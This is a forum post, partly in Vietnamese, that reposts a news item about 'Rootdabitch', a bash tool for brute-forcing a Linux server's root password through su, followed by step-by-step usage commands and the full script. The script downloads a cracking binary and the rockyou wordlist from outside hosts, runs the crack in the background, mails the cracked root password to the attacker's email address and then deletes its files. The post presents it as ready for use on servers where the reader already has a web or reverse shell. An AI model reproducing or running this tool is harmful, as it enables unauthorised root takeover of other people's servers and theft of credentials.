r00tw0rm hacker "th3breacher!" release Rootdabitch v0.1 ,which is a Multithreaded Linux/UNIX tool to brute-force cracking local root through su using sucrack.
sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su. The main feature of the Rootdabitch is that It's local brute forcer, using 10 passwords in 3 seconds. and works in background so you can leave it , when root is cracked it will email the user using /bin/mail .
All for this, you need to have a php shell/reverse shell/ssh access to the target to run thistool and run it as a normal user, Upload this script into it and give it the execution permission and execute the script like:
~ ./rootdabitch youremail@address.com
If the password is cracked you will have a mail with the root password and the password will be stored into password.txt . Try it !
Download : http://rootdabitch.googlecode.com/fi...abitch-0.1.zip
Anh em thảo luận
Nguồn: http://thehackernews.com/2012/04/roo...ithreaded.html
======
Dịch:
Nôm na là Script này crack password của root bằng cách Bruteforcer với 3 giây dc 10 passwords.
Để sử dụng cần có 1 shell trên server cho phép chạy command.
Upload file này lên site hoặc download nó về bằng lệnh
PHP Code:
wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip
PHP Code:
unzip rootdabitch-0.1.zip
PHP Code:
chmod +x rootdabitch.sh
PHP Code:
chmod 755 rootdabitch.sh
PHP Code:
./rootdabitch.sh tên_email
Code luôn, chỉ việc chmod and run:
#!/bin/bash # R00TW0RMs (https://www.r00tw0rm.com/) #-------------------------------------|------------------------------------------# # ( )_ ( ) ( ) _ ( )_ ( ) # _ __ _ _ | ,_) _| | _ _ | |_ (_)| ,_) ___ | |__ #( '__)/'_`\ /'_`\ | | /'_` | /'_` )| '_`\ | || | /'___)| _ `\ #| | ( (_) )( (_) )| |_ ( (_| |( (_| || |_) )| || |_ ( (___ | | | | #(_) `\___/'`\___/'`\__)`\__,_)`\__,_)(_,__/'(_)`\__)`\____)(_) (_) # This was written for educational purpose and pentest only. # Use it at your own risk. Author will be not responsible for any damage! # Coder : th3breacher|th3breacher.wordpress.com| # Version : 0.1 # Greetz : Inj3ct0r Team (1337day.com) #-------------------------------------|------------------------------------------# #Sucrack and wordlist links could be changed to a suitable one ! sucracklink="http://dl.dropbox.com/u/65302835/sucrack" wordlistlink="http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2" wordlistcompressedname="rockyou.txt.bz2" wordlistname="rockyou.txt" threads=10 #-------------------------------------|------------------------------------------# email=$1 mynohup(){ # Close stdin, and make any read attempt an error if [ -t 0 ] then exec 0>/dev/null fi # Redirect stdout to a file if it's a TTY if [ -t 1 ] then exec 1>nohup.out if [ $? -ne 0 ] then exec 1>$HOME/nohup.out fi fi # Redirect stderr to stdout if it's a TTY if [ -t 2 ] then exec 2>&1 fi # Trap the HUP signal to ignore it trap : HUP } downloadthatdic () { echo -ne "[+] Downloading the wordlist from $wordlistlink\n" wget $wordlistlink bunzip2 $wordlistcompressedname } downloadsucrack () { echo -ne "[+] Downloading sucrack from $sucracklink\n" wget $sucracklink chmod +x sucrack } action_send_mail_done() { SUBJECT="rootdabitch cracked password" # Email To ? EMAIL=$1 # Email text/message EMAILMESSAGE="password.txt" # send an email using /bin/mail mail -s "$SUBJECT" "$EMAIL" < $EMAILMESSAGE } action_send_mail_undone() { SUBJECT="rootdabitch :(" # Email To ? EMAIL=$1 # Email text/message EMAILMESSAGE="password2.txt" echo "failed..."> $EMAILMESSAGE # send an email using /bin/mail mail -s "$SUBJECT" "$EMAIL" < $EMAILMESSAGE } crackthatmofo () { echo -ne "[+] Cracking with 10 threads..." #You can change the threads number as you wish , just make sure it doesnt crash the server :) ./sucrack -w $threads $wordlistname | grep "password is:" >password.txt if [-f "password.txt"]; then action_send_mail_done $email else action_send_mail_undone $email fi } cleanup () { echo -ne "[+] Cleaning up..." rm -f $wordlistcompressedname rm -f $wordlistname rm -f sucrack } #Main starts here echo -ne "[+] Wait ! .. have patience=)\n" mynohup downloadsucrack downloadthatdic crackthatmofo cleanup